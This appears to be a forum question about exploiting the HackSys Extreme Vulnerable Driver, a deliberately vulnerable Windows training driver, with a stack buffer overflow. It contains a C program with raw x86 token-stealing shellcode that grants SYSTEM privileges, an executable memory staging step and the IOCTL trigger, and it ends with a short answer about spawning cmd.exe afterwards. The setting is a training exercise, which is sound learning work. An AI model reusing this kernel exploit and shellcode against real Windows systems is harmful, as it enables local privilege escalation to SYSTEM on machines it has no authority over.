
I am attempting to exploit the HEVD kernel driver buffer overflow challenge: https://github.com/hacksysteam/HackSysExtremeVulnerableDriver

However, when running the code below my Windows 7 machine doesn't execute the desired shellcode (assigning the SYSTEM token to the current process):

#include <windows.h>
#include <stdio.h>

/*
 * User-mode test program for the HEVD buffer-overflow exercise described in the
 * question: builds a 2084-byte input buffer, opens the HEVD device and sends the
 * buffer to it with a single DeviceIoControl() call.
 *
 * NOTE(review): malloc()/free() are used but <stdlib.h> is not included
 * directly; this only builds if <windows.h> happens to pull it in - confirm.
 * NOTE(review): no call below has its result checked (malloc -> NULL,
 * CreateFileA -> INVALID_HANDLE_VALUE, VirtualAlloc -> NULL,
 * DeviceIoControl -> FALSE), so any failure is silent.
 */
int main(void)
{
    /* 2084-byte input: the first 2080 bytes are filled with 0x41 here, the last
       4 bytes are written through address_field further down. */
    char *buf = malloc(2084);
    RtlFillMemory(buf, 2080, 0x41);

    /* Opens the HEVD device. 0xC0000000 == GENERIC_READ | GENERIC_WRITE,
       0x3 == OPEN_EXISTING. The handle is never passed to CloseHandle(). */
    HANDLE driver_hndle = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, NULL, 0x3, 0, NULL);

    /* Earlier variant of the payload, kept by the author but unused. */
    //unsigned char payload[] = "\x60\x31\xc0\x64\x8b\x80\x24\x01\x00\x8b\x40\x50\x89\xc1\xba\x04\x00\x00\x00\x8b\x80\xb8\x00\x00\x00\x2d\xb8\x00\x00\x00\x39\x90\xb4\x00\x00\x00\x75\xed\x8b\x90\xf8\x00\x00\x00\x89\x91\xf8\x00\x00\x00\x61\x5d\xc2\x08\x00";

    /* Raw x86 machine code. The question text describes what it is meant to do;
       nothing in this file validates or disassembles it. */
    unsigned char payload[] = { 0x60, 0x64, 0xA1, 0x24, 0x01, 0x00, 0x00, 0x8B, 0x40, 0x50, 0x89, 0xC1, 0xBA, 0x04, 0x00, 0x00, 0x00, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x2D, 0xB8, 0x00, 0x00, 0x00, 0x39, 0x90, 0xB4, 0x00, 0x00, 0x00, 0x75, 0xED, 0x8B, 0x90, 0xF8, 0x00, 0x00, 0x00, 0x8B, 0xB9, 0xF8, 0x00, 0x00, 0x00, 0x83, 0xE2, 0xF8, 0x83, 0xE7, 0x07, 0x01, 0xFA, 0x89, 0x91, 0xF8, 0x00, 0x00, 0x00, 0x61, 0x31, 0xC0, 0x5D, 0xC2, 0x08, 0x00 };
    size_t payload_sz = sizeof(payload);

    /* Executable scratch region for the payload: 0x3000 == MEM_COMMIT | MEM_RESERVE,
       0x40 == PAGE_EXECUTE_READWRITE. It is never released with VirtualFree(). */
    LPVOID payload_ptr = VirtualAlloc(0, payload_sz, 0x3000, 0x40);
    RtlMoveMemory(payload_ptr, payload, payload_sz);

    /* Writes the final 4 bytes of buf. Note that &payload_ptr is the address of
       the local variable payload_ptr itself, not the value VirtualAlloc()
       returned; the question text already suspects this line. */
    DWORD* address_field = (DWORD*)(buf + 2080);
    *address_field = (DWORD)(&payload_ptr);

    /* buf is a char *, so sizeof(buf) is the size of a pointer (4 on a 32-bit
       build), not the 2084 bytes allocated above - the classic sizeof-on-pointer
       pitfall; that is the input length the driver is told it received. The
       BOOL result is discarded and size_return is never read afterwards. */
    DWORD size_return = 0;
    DeviceIoControl(driver_hndle, 0x222003, buf, sizeof(buf), NULL, 0, &size_return, NULL);

    free(buf);
    return 0;
}

I believe the issue is how I point the last 4 bytes of buf at the memory address returned from VirtualAlloc. I've also tried:

/* Alternative the author tried: memcpy() reads sizeof(payload_ptr) bytes from
   the variable payload_ptr, i.e. the pointer value it holds (the VirtualAlloc()
   result), and stores them in the last 4 bytes of buf. */
memcpy(buf + 2080, &payload_ptr, sizeof(payload_ptr));

Since this shellcode is known to run on any Windows 7 machine, I do not believe the issue lies within the shellcode. I've tested the shellcode in a Python PoC with the expected results (an NT AUTHORITY\SYSTEM cmd.exe opening). The shellcode steals the token of the SYSTEM process (PID 0x4), assigns it to a new cmd.exe process and spawns it. Can anyone help me understand what I'm doing wrong here?



    The issue was that I was not spawning a cmd.exe process via _popen or system after the shellcode had executed.
